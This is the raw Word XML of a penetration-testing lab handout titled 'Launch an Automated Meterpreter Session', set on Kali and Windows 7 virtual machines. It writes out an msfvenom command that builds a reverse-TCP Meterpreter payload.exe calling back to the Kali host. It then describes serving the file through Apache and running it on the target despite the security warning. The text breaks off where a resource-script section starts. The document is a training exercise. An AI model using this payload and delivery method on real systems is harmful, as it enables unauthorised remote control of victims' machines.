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D4BEC" w14:textId="4BA008EF" w:rsidR="007E78BF" w:rsidRPr="00732FB7" w:rsidRDefault="00A51DF4" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab  - </w:t>
      </w:r>
      <w:r w:rsidR="00083DB9" w:rsidRPr="00732FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Launch</w:t>
      </w:r>
      <w:r w:rsidR="007552CC" w:rsidRPr="00732FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00732FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F178D6" w:rsidRPr="00732FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">n Automated </w:t>
      </w:r>
      <w:r w:rsidRPr="00732FB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C56669E" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:p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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB729E" w14:textId="7F2AD536" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00265301">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab, you will learn how to </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk59076498"/>
      <w:r w:rsidR="00183548">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">spawn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a Meterpreter session on a Windows 7 Pro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine </w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by creating an automated resource script file to launch within </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit. Having an established reverse shell is a requirement </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for any post-exploitation of Microsoft Windows lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Having the ability to </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">establish a meterpreter </w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">reduces the burden </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when preparing our</w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lab environment for any Microsoft Windows post</w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exploitation labs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71591294" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A37D86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012AA949" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRPr="00A37D86" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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A37D86">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>One virtual install of Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD1030" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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A37D86">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">One virtual install of windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7 Pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7652E3E4" w14:textId="3D130EE0" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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VirtualBox networking should be set to NAT Network for both </w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDA10E" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50CA1">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AD77DBB" wp14:editId="77FF4DA4">
            <wp:extent cx="3724102" cy="13563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03574" cy="142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88068" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A74A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Find the IP address of your Kali Linux Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54030C51" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRPr="002A74A0" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From your Kali machine, open a terminal, and at the prompt, type ifconfig. Find the IP address assigned to your eth0 adapter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC670E" w14:textId="7A840992" w:rsidR="007E78BF" w:rsidRDefault="00C747C7" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76FF9983" wp14:editId="5525010E">
            <wp:extent cx="5381511" cy="16002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558" cy="1607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A3F94" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC7849">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>This is my IP address! Yours will differ!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0535F326" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On your Kali desktop, create a new folder called temp. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDBF3E" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38999485" wp14:editId="76E37B38">
            <wp:extent cx="1734589" cy="1572694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973" cy="1605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E571B" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C60395">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C60395">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>click on the new folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C60395">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and from the context menu, select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60395">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open Terminal Here</w:t>
      </w:r>
      <w:r w:rsidRPr="00C60395">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29409FBF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FFB096F" wp14:editId="3C851264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D3350" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRPr="002A74A0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is opens a new terminal window inside the new temp folder. This is where we will save our infected payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E63E21" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A37D86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating a Malicious .exe File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EA6F6C" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We first need to establish a reverse shell between our Kali and our Windows 7 Pro target. To do this, we will generate an infected payload using </w:t>
      </w:r>
      <w:r w:rsidRPr="007A02A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1709A" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRPr="00A50CA1" w:rsidRDefault="007E78BF" w:rsidP="007E78BF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B76A8E" wp14:editId="3C7FB1F6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1139244</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>186591</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="213038" cy="405595"/>
                <wp:effectExtent l="38100" t="0" r="34925" b="5207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038" cy="4055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F6123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89.7pt;margin-top:14.7pt;width:16.75pt;height:31.9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 w:rsidRPr="00F00BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Change the LHOST IP address to that of your Kali machine.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50CA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41419277" w14:textId="77777777" w:rsidR="002040C9" w:rsidRPr="002040C9" w:rsidRDefault="002040C9" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002040C9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002040C9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002040C9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a x86 LHOST=10.0.2.15 LPORT=4444 -f exe -o payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D14C8" w14:textId="70B09499" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The command above instructs </w:t>
      </w:r>
      <w:r w:rsidRPr="007A02A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to generate an x86 Windows executable file that implements a reverse TCP connection back to our Kali machine when launched from within Windows 7. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383014A" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>The format (-f) must be specified as being type .exe, and the localhost (LHOST) and local port (LPORT) must be defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D55C69" w14:textId="77777777" w:rsidR="007E78BF" w:rsidRPr="002A74A0" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port to listen on for a connection from the target once it has been compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B46EA87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t the prompt, copy and paste your msfvenom code.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA03AB2" w14:textId="07239B4B" w:rsidR="007E78BF" w:rsidRDefault="002040C9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513A306" wp14:editId="3E9AEC3A">
            <wp:extent cx="5937885" cy="1306195"/>
            <wp:effectExtent l="0" t="0" r="5715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816" cy="131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8B008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Minimize your terminal screen. From your desktop, open the temp folder we created earlier. Inside you will see the payload.exe we just created. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2285F5EE" w14:textId="61C34DDC" w:rsidR="007E78BF" w:rsidRDefault="00882764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06733DC" wp14:editId="46CB32BC">
            <wp:extent cx="4985238" cy="1535396"/>
            <wp:effectExtent l="0" t="0" r="635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00" cy="154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A5DC9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ight-click on the newly created payload.exe file, and from the context menu, select Copy. Close the temp folder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CE0E1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A1F00C4" wp14:editId="526D2BDB">
            <wp:extent cx="3133725" cy="26697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761" cy="2685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BF121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move the file to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00164C53">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">var/www/html </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E4D37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From your desktop, click on File System. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196502BC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138436E" wp14:editId="267FA8C1">
            <wp:extent cx="2181225" cy="1019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6B246" w14:textId="751AAAFF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side the right </w:t>
      </w:r>
      <w:r w:rsidR="00B97DFA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windowpane</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, scroll down until you come to the var directory and open. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E920851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A79CD22" wp14:editId="7DBF3CBB">
            <wp:extent cx="4781550" cy="284287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787" cy="2865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5B996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side the var directory, open the www directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD5EC5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89D8A8" wp14:editId="3F496F49">
            <wp:extent cx="4981575" cy="15512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723" cy="15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99D02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side the www directory, open the html directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76392FB6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7F3F1D94" wp14:editId="335EC3B5">
            <wp:extent cx="3618963" cy="962736"/>
            <wp:effectExtent l="0" t="0" r="63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160" cy="100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85F18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nside the html directory, right-click and paste your payload.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F94C682" w14:textId="277339C6" w:rsidR="007E78BF" w:rsidRDefault="002040C9" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002040C9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0A7C1A1B" wp14:editId="5A7FF966">
            <wp:extent cx="4387362" cy="1559013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0232" cy="15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11D6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 everything out and return to your terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458201E" w14:textId="73D50386" w:rsidR="002040C9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next need to start the Apache web service. At the prompt, type</w:t>
      </w:r>
      <w:r w:rsidR="002040C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070929D2" w14:textId="0547E0D7" w:rsidR="007E78BF" w:rsidRPr="002040C9" w:rsidRDefault="007E78BF" w:rsidP="007E78BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002040C9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002040C9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0596000F" w14:textId="365F9249" w:rsidR="007E78BF" w:rsidRDefault="002040C9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6098568" wp14:editId="6238C161">
            <wp:extent cx="4251325" cy="12585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25" cy="125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CFDB6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Hit enter. It comes back to the prompt letting you know that the command was completed successfully. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EE2D25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Minimize your Kali machine and bring up your Windows 7 Pro. From the desktop. Launch Internet Explorer. In the address bar, type the IP address assigned to your Kali machine, followed by a forward slash and the name of your msfvenom payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146D236" w14:textId="38C73914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example, I have typed </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="002040C9" w:rsidRPr="00D72718">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.0.2.15/payload.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB3F6E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hen you hit enter, you either prompted to either run or save the file. We need to save the file to the Documents folder of the target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD2252" w14:textId="6799CD5B" w:rsidR="007E78BF" w:rsidRDefault="00E74145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13580BE" wp14:editId="388F2C0D">
            <wp:extent cx="5934710" cy="200469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A88F1" w14:textId="12242AF9" w:rsidR="007E78BF" w:rsidRPr="00E74145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Click the Save button</w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E74145">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you can ignore the security warning. Click on </w:t>
      </w:r>
      <w:r w:rsidR="00E74145" w:rsidRPr="00E74145">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>View downloads</w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E74145">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E74145" w:rsidRPr="00E74145">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or you can go into your Downloads folder. Find the newly downloaded payload.exe. You can either run it here or move it to another location. I moved mine to My documents folder.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698FBAF" w14:textId="5EBA6932" w:rsidR="00E74145" w:rsidRDefault="00E74145" w:rsidP="007E78BF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345E1568" wp14:editId="18680C81">
            <wp:extent cx="5763429" cy="600159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DC65E" w14:textId="405CB19B" w:rsidR="007E78BF" w:rsidRDefault="00E74145" w:rsidP="007E78BF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4A2A6BE1" wp14:editId="64AE15DB">
            <wp:extent cx="4237892" cy="177668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63695" cy="178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FC5DD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will return to launch the payload once we have started or reverse shell using Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB2CB0" w14:textId="25894765" w:rsidR="00075467" w:rsidRDefault="00075467" w:rsidP="00075467">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Writing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Launch Our Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662FEE58" w14:textId="638A6128" w:rsidR="00075467" w:rsidRDefault="00075467" w:rsidP="00075467">
      <w:r>
        <w:t>When having to establish the same Meterpreter session multiple times.</w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t xml:space="preserve">e can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">build a resource file that will </w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t xml:space="preserve">store </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t xml:space="preserve">commands and </w:t>
      </w:r>
      <w:r w:rsidR="00C747C7">
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidRPr="00075467">
        <w:t>run a single command to execute all of them.</w:t>
      </w:r>
